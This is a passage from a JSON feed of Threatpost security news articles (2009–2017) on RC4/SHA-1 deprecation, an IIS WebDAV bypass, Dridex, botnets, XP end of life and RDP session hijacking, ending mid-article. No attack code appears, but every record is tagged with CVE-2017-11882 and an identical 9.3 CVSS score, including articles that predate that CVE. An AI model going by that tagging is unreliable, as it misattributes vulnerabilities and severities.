feasible for attackers, and so Microsoft is telling developers to drop RC4 from their applications.\n\n\u201cIn light of recent research into practical attacks on biases in the RC4 stream cipher, Microsoft is recommending that customers enable TLS1.2 in their services and take steps to retire and deprecate RC4 as used in their TLS implementations. 
Microsoft recommends TLS1.2 with AES-GCM as a more secure alternative which will provide similar performance,\u201d Microsoft\u2019s William Peteroy said in a [blog post](<https://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx?Redirected=true>).\n\n\u201cOne of the first steps in evaluating the customer impact of new security research and understanding the risks involved has to do with evaluating the state of public and customer environments. Using a sample size of five million sites, we found that 58% of sites do not use RC4, while approximately 43% do. Of the 43% that utilize RC4, only 3.9% require its use. Therefore disabling RC4 by default has the potential to decrease the use of RC4 by over almost forty percent.\u201d\n\nThe software company also is recommending that certificate authorities and others stop using the SHA-1 algorithm. Microsoft cited the existence of known collision attacks against SHA-1 as the main reason for advising against its use. Also, after January 2016, Microsoft developers can no longer use SHA-1 in code-signing or developer certificates.\n\n_Image from Flickr photos of [Josh Bancroft](<http://www.flickr.com/photos/joshb/>). _\n", "cvss3": {}, "published": "2013-11-12T16:07:39", "type": "threatpost", "title": "Microsoft Warns Customers Away From RC4, SHA-1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-14T18:14:04", "id": "THREATPOST:E7C5C8276111C637456F053327590E4C", "href": "https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[](<https://threatpost.com/serious-new-flaw-found-iis-60-051809/>)\n\nA new remotely-exploitable vulnerability has been found in the Microsoft IIS 6.0 Web server. 
The flaw is quite similar to one that was discovered eight years ago in earlier versions of IIS, and exploitation of the weakness could enable an attacker to upload content to the vulnerable server.\n\nThe vulnerability is in the implementation of the WebDAV protocol in IIS 6.0, which allows remote users to access and modify documents on a Web server. News of the vulnerability, discovered by a researcher named Nikolaos Rangos, hit the [Full Disclosure security mailing list](<http://seclists.org/fulldisclosure/2009/May/att-0134/IIS_Advisory_pdf>) last week. Here are the details, from Rangos\u2019s advisory:\n\nThis vulnerability allows remote attackers to bypass access restrictions on vulnerable installations of Internet Information Server 6.0. The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can \nresult in the following: \n\u2013 Authentication bypass of password protected folders \n\u2013 Listing, downloading and uploading of files into a password protected WebDAV folder\n\nThere is no patch available for this vulnerability, so experts at the SANS Internet Storm Center are recommending that people disable WebDAV in the interim. Thierry Zoller has a good analysis of the [IIS 6.0 vulnerability](<http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html>) as well.\n\nMicrosoft\u2019s Security Response Center is investigating the WebDAV vulnerability and is in the process of putting together an advisory on it.\n\n\u201cMicrosoft is investigating new public claims of a possible vulnerability in Internet Information Services. We\u2019re currently unaware of any attacks trying to use the claimed vulnerability or of customer impact. 
We are working on a security advisory to provide customers with guidance to help protect themselves,\u201d said Christopher Budd, security response communications lead at Microsoft.\n", "cvss3": {}, "published": "2009-05-18T15:36:07", "type": "threatpost", "title": "Serious new flaw found in IIS 6.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:7957677E374E9980D5154F756D4A2E00", "href": "https://threatpost.com/serious-new-flaw-found-iis-60-051809/72672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:47", "description": "Do you find e-mail pleas for help from the widow of Democratic Republic of the Congo strongman Mobutu Sese Seko unconvincing or downright silly? That may be the point, according to Microsoft researcher Cormac Herley.\n\nThe outlandish claims of Nigerian Letter \u2013 or \u201c419\u201d \u2013 scams serve a critical purpose: separating the skeptics from the suckers. That\u2019s the conclusion of a new [paper published by Microsoft Research](<http://research.microsoft.com/apps/pubs/default.aspx?id=167712>) and scheduled to be presented on June 25th at the Workshop on the Economics of Information Security (WEIS) 2012 Conference in Berlin, Germany.\n\n\n\nThe paper, \u201c[Why do Nigerian Scammers Say They are from Nigeria?](<http://research.microsoft.com/pubs/167712/WhyFromNigeria.pdf>)\u201d (PDF) by researcher Cormac Herley analyzes the methods that online scammers use to navigate around a common problem in any detection program: false positives.\n\nIn the context of online scams, a \u201cfalse positive\u201d is any individual who is attacked, but yields nothing to the attacker.\n\nAs the density of potential victims decreases, Herley observes, the share of them that can be profitably attacked plummets. 
That leaves scammers in a Catch-22: only by targeting large numbers of potential victims can scammers find enough viable targets to make a profit. But the incremental cost of running 419 scams makes it unprofitable to target a large number of potential victims. That is, unless the attackers have an easy (and cheap) way to distinguish between the suckers and the non-suckers.\n\nAnd that\u2019s where \u201cNigeria\u201d comes in. Basing the attack on an absolutely absurd and unbelievable premise (i.e. far-fetched stories of West African riches) is, according to Herley, an advantage to the attacker.\n\n\u201cBy sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.\u201d\n\nHerley is the principal researcher at Microsoft\u2019s machine learning department. The work on Nigerian scams isn\u2019t his first try at parsing the economics of fraud. His past research has debunked industry claims about [the size of the underground economy](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) and the [utility of cybercrime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>), among other topics. You can read more on the WEIS 2012 conference Web site [here](<http://weis2012.econinfosec.org/program.html>). 
\n", "cvss3": {}, "published": "2012-06-21T12:40:09", "type": "threatpost", "title": "It's The Stupidity, Stupid: How Absurd Pitches Help Online Scammers Find Their Marks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:29", "id": "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "href": "https://threatpost.com/its-stupidity-stupid-microsoft-says-absurd-pitches-help-online-scammers-find-their-marks-06211/76718/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "description": "Not long ago, criminals pushing the Dridex banking Trojan were using [Microsoft Excel documents spiked with a malicious macro](<http://threatpost.com/dridex-banking-trojan-spreading-via-office-macros/110255>) as a phishing lure to entice victims to load the malware onto their machines.\n\nEven though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure.\n\nResearchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users\u2019 trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines.\n\nThe XML files are passed off as \u201cremittance advice,\u201d or payment notifications, with the hopes that some users will believe it\u2019s an innocent text file and execute the malicious code.\n\n\u201cXML files are the old binary format for Office docs and once you double click them to open, the file associated with Microsoft Word and opens,\u201d said Karl Sigler, Trustwave threat intelligence manager. 
The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to be viewed properly or to ensure proper security. \u201cWhich is the exact opposite of what this does,\u201d Sigler said. \u201cIt doesn\u2019t seem to be all that sophisticated. They\u2019re either trying to capitalize on a user\u2019s trust in XML files, or the fact that a user may not be that familiar with what that extension is.\u201d\n\nIf the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visit an online banking site and then injects code onto the bank site in order to capture the user\u2019s credentials for their online account.\n\nSigler said this is the first time they\u2019ve spotted XML docs used as a lure. As for macros, they\u2019ve been disabled by default since Office 2007 was released.\n\n\u201cSometimes in large organizations, local administrators have the ability to enable macros,\u201d Sigler said. \u201cSome organizations use them quite a bit, but it\u2019s not common. Most people leave the default settings. It\u2019s hard to say why these guys moved to XML. It could be that they\u2019re looking for a new attack vector and they weren\u2019t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they\u2019re looking for a way to better their success rate.\u201d\n\nDridex is a descendent of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. 
P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.\n", "cvss3": {}, "published": "2015-03-06T13:38:40", "type": "threatpost", "title": "Dridex Banking Trojan Spreading Via Macros in XML Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-10T11:23:01", "id": "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "href": "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:00", "description": "One by one, tech companies have [been tossing aside the SHA-1 cryptographic algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) like the unreliable collision-prone mess that it is.\n\nMicrosoft was among the first to steer its customers away from SHA-1 and established an internal edict that its developers would no longer use it for code-signing or its certificates after January 2016.\n\nYesterday among the flurry of its [Patch Tuesday security bulletins](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>), Microsoft took another important step when it issued a pair of security advisories, one notifying users that it had made the [SHA-2 algorithm available for Windows 7 and Windows Server 2008 R2](<https://technet.microsoft.com/en-us/library/security/2949927>). 
The other was an update for Microsoft EAP implementations that [enables the use of Transport Layer Security (TLS) 1.1 or 1.2](<https://technet.microsoft.com/en-us/library/security/2977292>).\n\nSHA-1 collisions have been theoretically possible for years; collisions occur when an attacker is able to generate a certificate with the same signature as the original cert. Though mathematically possible, a collision attack, even against a weakened SHA-1, would take significant hardware resources in order to execute.\n\nThat gap, however, is narrowing. In 2012, Bruce Schneier published research in which he concluded that [collisions would be within reach of most hackers by 2018](<http://threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Citing calculations done by Jesse Walker based on the cost of commodity microprocessors and evidence that Moore\u2019s law will extend another decade, server-cycle costs would be around $173,000 on Amazon, well within reach of a funded attacker such as an organized crime group or nation state.\n\nThe use of fraudulent certificates would allow an advanced attacker such as a nation state to pose as Microsoft, Google or any site of their choosing, putting web traffic and personal communication at risk. Google, and most recently Mozilla, have announced their road maps for SHA-1 deprecation. Beginning with an upcoming Chrome release in November, [Google\u2019s browser will no longer trust websites whose certificate chains trust SHA-1](<http://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>). 
Mozilla, meanwhile, asked Certificate Authorities and websites to [upgrade to cryptographically stronger versions of the algorithm](<http://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>) and said it would no longer trust SHA-1 certs after Jan. 1, 2017.\n\nMicrosoft\u2019s decision to make SHA-2 available for Windows 7 means that it joins Windows 8, 8.1 and Windows Server 2012, 2012 R2 and Windows RT and RT 8.1, as Windows versions that already support SHA-2. Windows 8 and higher support it by default and do not require an update, Microsoft said, adding that the update is not available for Windows Server 2003, Windows Vista, or Windows Server 2008.\n\nMicrosoft\u2019s decision to enable TLS for EAP implementations continues its push to encrypt its web-based services. In July, Microsoft announced that its webmail service [Outlook.com supports TLS encryption](<http://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>) inbound and outbound, in addition to Perfect Forward Secrecy. OneDrive cloud storage also enabled Perfect Forward Secrecy in July, Microsoft said. PFS randomizes private encryption keys, meaning that if a key is someday compromised, it cannot be used to decrypt old messages.\n\nEAP, or Extensible Authentication Protocol, is the authentication framework used in Windows client and server rollouts. Windows 7, Windows Server 2008 R2, Windows 8, Windows 8.1, Windows Server 2012, and Windows RT are enabled through the update to support TLS via a simple registry modification, Microsoft said. A hacker who is able to exploit an older version of TLS could carry out a man-in-the-middle attack, hijack traffic and steal information in plaintext from sessions thought to be encrypted.\n\n_This article was updated Oct. 
16 clarifying that SHA-2 is available only for Windows 7 and up, and earlier supported versions of Windows will not support SHA-2._\n", "cvss3": {}, "published": "2014-10-15T11:40:36", "type": "threatpost", "title": "Microsoft Extends SHA-2, TLS Support for Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-10-21T15:09:13", "id": "THREATPOST:AE4AEC18802953FE366542717C056064", "href": "https://threatpost.com/microsoft-extends-sha-2-tls-support-for-windows/108855/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? 
For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publicly disclose their research because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). 
The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. 
I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "A researcher has exposed how attackers with local admin privileges could use native command-line Windows tools to hijack other users\u2019 sessions without credentials.\n\nResearcher Alexander Korznikov on Friday published a [report](<http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html>) in which he describes how he could, locally and remotely via Remote Desktop Protocol (RDP), access other users\u2019 sessions\u2014even sessions that have been disconnected for some time\u2014with one command.\n\nKorznikov said an attacker could access domain admin sessions, read documents, and access systems, cloud domains or applications (email, Notepad, others) that the user has previously logged in to. He said he tested his attack on Windows 2012 and Windows 2008 servers, as well as Windows 10 and Windows 7 and all that is required is the NT AUTHORITY/SYSTEM command line, or to create a service that will connect a session back to the attacker\u2019s.\n\n\u201cSomeone can say, \u2018If you are admin, you can dump a server\u2019s memory and parse it.\u2019 That\u2019s correct, but you don\u2019t need it any more,\u201d Korznikov told Threatpost. \u201cJust two simple commands and you are in. The most incredible thing is that I don\u2019t need to know the credentials of the hijacked user. 
It is pure password-less hijacking.\u201d\n\nhttps://www.youtube.com/watch?v=oPk5off3yUg\n\nhttps://www.youtube.com/watch?v=VytjV2kPwSg\n\nResearcher Kevin Beaumont, meanwhile, published a [separate report](<https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6#.tlqebcmqe>) essentially confirming Korznikov\u2019s work, adding that by running the tscon.exe command as the SYSTEM user, an attacker could also connect to any session without a password.\n\n\u201cIt doesn\u2019t prompt, it just connects you to the user\u2019s desktop. I believe this is due to the way session shadowing was implemented in Microsoft Windows, and it runs throughout the years like this,\u201d Beaumont wrote.\n\nBeaumont said that his and Korznikov\u2019s research could bypass the work required to dump server memory and parse for passwords; this provides instant access to the target\u2019s desktop without leaving artifacts in a log or needing to use external tools such as Metasploit.\n\n\u201cThis isn\u2019t about SYSTEM \u2014 this is about what you can do with it very quickly, and quietly. Attackers aren\u2019t interested in playing, they\u2019re interested in what they can do with techniques. This is a very valid technique,\u201d Beaumont wrote. \u201cSo, you have full blown RDP session hijacking, with a single command.\u201d\n\nKorznikov said he confirmed with Benjamin Delpy, who six years ago disclosed [similar findings](<http://blog.gentilkiwi.com/securite/vol-de-session-rdp>), that this was a Windows feature and not a vulnerability, but that does not discount the attack value of the situation, he said. 
Microsoft, for its part, is unlikely to patch this.\n\n\u201cThe issue described in the report is not a security vulnerability as it requires local administrator rights on the machine,\u201d a Microsoft spokesperson told Threatpost.\n\nKorznikov said he did not disclose his findings to Microsoft prior to publication of his report last week because it was a design flaw issue, out of scope for its bug bounties, and that he did not want to wait \u201csix months until resolution for a CVE.\u201d\n\n\u201cIf you are admin, you can do everything. But here is the point: why and how you become admin? If some unprivileged user becomes admin using some kind of local privilege escalation, that\u2019s the problem\u2014and not the design flaw\u2014we are talking about,\u201d Korznikov said. \u201cYou can do everything, even patch terminal services in a way that it will accept your token and allow shadowing mode, without a user\u2019s knowledge.\u201d\n", "cvss3": {}, "published": "2017-03-20T14:50:07", "type": "threatpost", "title": "Local Windows Admins Can Hijack Sessions Without Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-22T21:45:56", "id": "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "href": "https://threatpost.com/local-windows-admins-can-hijack-sessions-without-credentials/124427/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/>)Microsoft on Friday said it has reached a settlement with a Russian programmer it named as a defendant in a lawsuit related to the operation of the notorious [Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>). The company said that it no longer believes Andrey N. 
Sabelnikov was the operator of the botnet, but was instead responsible for writing some code that was later used by the botnet.\n\nThis is a departure from the company\u2019s earlier statements, which painted Sabelnikov as someone \u201cresponsible for the operations of the Kelihos botnet.\u201d After working with researchers at Kaspersky Lab and other organizations to take down the Kelihos botnet in the autumn of 2011, Microsoft amended its original complaint to include Sabelnikov as a defendant. The company alleged in a complaint filed in U.S. District Court in January that not only did Sabelnikov [write some of the Kelihos code](<https://threatpost.com/microsoft-adds-kelihos-botnet-operator-civil-complaint-012412/>), but he helped run the botnet.\n\n\u201cIn today\u2019s complaint, Microsoft presented evidence to the court that Mr. Sabelnikov wrote the code for and either created, or participated in creating, the Kelihos malware. Further, the complaint alleges that he used the malware to control, operate, maintain and grow the Kelihos botnet. These allegations are based on evidence Microsoft investigators uncovered while analyzing the Kelihos malware. Microsoft also alleges that Mr. Sabelnikov registered more than 3,700 \u2018cz.cc\u2019 subdomains from Mr. Piatti and dotFREE Group SRO, and misused those subdomains to operate and control the Kelihos botnet,\u201d Richard Boscovich, a senior staff attorney in the Microsoft Digital Crimes Unit, wrote in a [blog post at the time](<https://blogs.technet.com/b/microsoft_blog/archive/2012/01/23/microsoft-names-new-defendant-in-kelihos-case.aspx?Redirected=true>). \n\nNow, Microsoft is taking a somewhat different tack. Rather than accusing Sabelnikov of running the Kelihos botnet, the company [released a statement](<https://blogs.technet.com/b/microsoft_blog/archive/2012/10/19/microsoft-reaches-settlement-with-second-kelihos-defendant.aspx?Redirected=true>) saying that he merely wrote some of the malware\u2019s code. 
As a result, the company and the programmer reached an undisclosed out-of-court settlement.\n\n\u201cMicrosoft and St. Petersburg software programmer Andrey Sabelnikov have entered into a Settlement Agreement in the matter of Microsoft v. Sabelnikov. During the negotiations, after reviewing the evidence provided by Microsoft and engaging in discussions, the parties have come to an understanding that Mr. Sabelnikov wrote code that was used in the Kelihos botnet code, but the programmer is not the operator of the botnet or involved in its activities. After a review and understanding of all of the details of the case, the parties were able to enter into a confidential settlement agreement in this matter, which resolves the dispute between the parties,\u201d Boscovich wrote on Friday.\n\nMicrosoft has been quite aggressive in its efforts to disrupt and take down botnets in the last couple of years, using both technical and legal tactics to knock the networks offline. The company has gone after several different botnets, with varying degrees of fervor and success, but the Kelihos operation was the first time that Microsoft had named any individuals as defendants in its legal complaints. 
Until then it had focused on hosting providers or other corporate entities allegedly involved in botnet operations.\n", "cvss3": {}, "published": "2012-10-19T19:01:33", "type": "threatpost", "title": "Microsoft Settles With Kelihos Botnet Defendant, Says He Didn't Run the Network", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:21", "id": "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "href": "https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/77135/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:14", "description": "[](<https://threatpost.com/research-reveals-huge-cache-ftp-email-credentials-stolen-waledac-020211/>)Researchers have discovered that the gang behind the once-and-future botnet Waledac has gathered nearly 500,000 stolen passwords for email accounts, along with close to 125,000 sets of pilfered credentials for FTP accounts.\n\nThe discovery isn\u2019t so surprising in its details, but rather in its scope. There are a slew of Trojans and info-stealing pieces of malware around these days that are designed specifically to seek out and steal this kind of data. Email passwords, which often are simple and reused on other accounts by victims, can give attackers access to far more than just a victim\u2019s mundane message exchanges with friends. 
Email accounts can lead to online banking credentials, credit card accounts and other high-value data.\n\nResearchers at The Last Line of Defense, a security firm comprising professors and grad students from universities around the world, [analyzed the data that the Waledac crew had gathered](<http://blog.tllod.com/2011/02/01/calm-before-the-storm/>) and found that the email credentials were being used in spam campaigns designed to evade real-time blacklists and other filters.\n\n\u201cWe also discovered 489,528 credentials for POP3 email accounts. These credentials are known to be used for \u201c[high-quality\u201d spam campaigns](<http://www.usenix.org/event/leet10/tech/full_papers/Nunnery.pdf>). The technique abuses legitimate mail servers by authenticating as the victim through the SMTP-AUTH protocol to send spam messages. This method makes IP-based blacklist filtering considerably more difficult,\u201d the analysis said.\n\nWaledac is one of the more intriguing botnets in recent years, not because of its methods or targets, but because of its resilience. Microsoft and some other groups [took action against the Waledac botnet](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>) in February 2010, in large part to stem the tide of spam messages that were flooding email servers at Hotmail and other consumer email services. Within a month of the action, which involved taking down hundreds of domains Waledac was using for command and control, the botnet was essentially dead in the water.\n\nHowever, late last year Waledac appeared to spring back to life, beginning a major spam campaign right around the end of December and beginning of January, sending out the always-popular holiday e-cards. And spam levels in general began to spike in late January. 
But, the TLLOD researchers said that the renewed spam activity from Waledac came well after the botnet\u2019s creators began offering a new service for getting C&C servers up and running.\n\n\u201cIn addition to the compromised credentials, we also had visibility of newly infected nodes connecting to a bootstrap Command-and-Control server. The bootstrap server speaks a proprietary protocol known as ANMP, and disseminates a list of router nodes (other compromised hosts) to infected machines. Note that every node generates a random 16 byte ID, that is reported back to Waledac\u2019s C&Cs. Our analysis indicates that the bootstrap service first appeared online on December 3, 2010 well before the New Year\u2019s spam campaign. In total, there were 12,249 unique node IDs that connected to the bootstrap C&C, and 13,070 router IDs,\u201d Brett Stone-Gross said in his analysis of the Waledac resurgence.\n", "cvss3": {}, "published": "2011-02-02T14:52:18", "type": "threatpost", "title": "Research Reveals Huge Cache of FTP, Email Credentials Stolen by Waledac", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:15", "id": "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "href": "https://threatpost.com/research-reveals-huge-cache-ftp-email-credentials-stolen-waledac-020211/74900/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:39", "description": "[](<https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/>)Microsoft is trying to boost adoption of the software security practices in its Security Development Lifecycle by releasing a revised set of instructions to make implementation of the process easier and faster. 
\n\nAt the Black Hat DC conference on Tuesday, the company announced the release of its [\u201cSimplified Implementation of the Microsoft SDL\u201d](<http://www.microsoft.com/downloads/details.aspx?FamilyID=0baff8e8-ab17-4e82-a1ff-7bf8d709d9fb&displaylang=en>) paper, as well as a template designed to help developers integrate Microsoft\u2019s SDL, along with the Agile Software Development process, into Visual Studio. That template will enable developers to automatically check all of their code developed in Visual Studio against the SDL framework. \n\nMicrosoft has been pushing the need for more secure software development practices for several years, but some organizations have said that the company\u2019s SDL model is too difficult and expensive to implement, and doesn\u2019t fit into their organization\u2019s development structure. So the company is releasing the simplified description of the SDL implementation process in an effort to get more developers on board.\n\n\u201cThe process outlined in this paper sets a minimum threshold for SDL compliance. 
That said, organizations aren\u2019t uniform \u2013 development teams should apply the SDL in a way that is suitable to the human talent and resources available, but doesn\u2019t compromise organizational security goals,\u201d the company said in the SDL paper.\n\nThe paper defines various roles for people involved in the SDL process, and lays out required and optional SDL activities, as well as a five-phase process from requirements through release.\n", "cvss3": {}, "published": "2010-02-02T15:39:41", "type": "threatpost", "title": "Microsoft Tries to Boost SDL Adoption", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:34:21", "id": "THREATPOST:7E30033E60118E5B4B8C14689A890155", "href": "https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/73469/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-10T12:12:46", "description": "The well-known LokiBot malware has popped up in several malicious spam campaigns [over the past year](<https://threatpost.com/threatlist-ransomware-eks-and-trojans-lead-the-way-in-q3-malware-trends/138433/>), covertly siphoning information from victims\u2019 compromised endpoints. Researchers this week are warning of the most recent sighting of the malware, which was recently spotted in spam messages targeting a large U.S. manufacturing company.\n\nResearchers first discovered the campaign on Aug. 21 after an unnamed U.S. semiconductor distributor received a spam email sent to the sales department from a potentially compromised \u201ctrusted\u201d sender. The email, purporting to be distributing an attached request for quotation, was actually harboring prolific trojan LokiBot. 
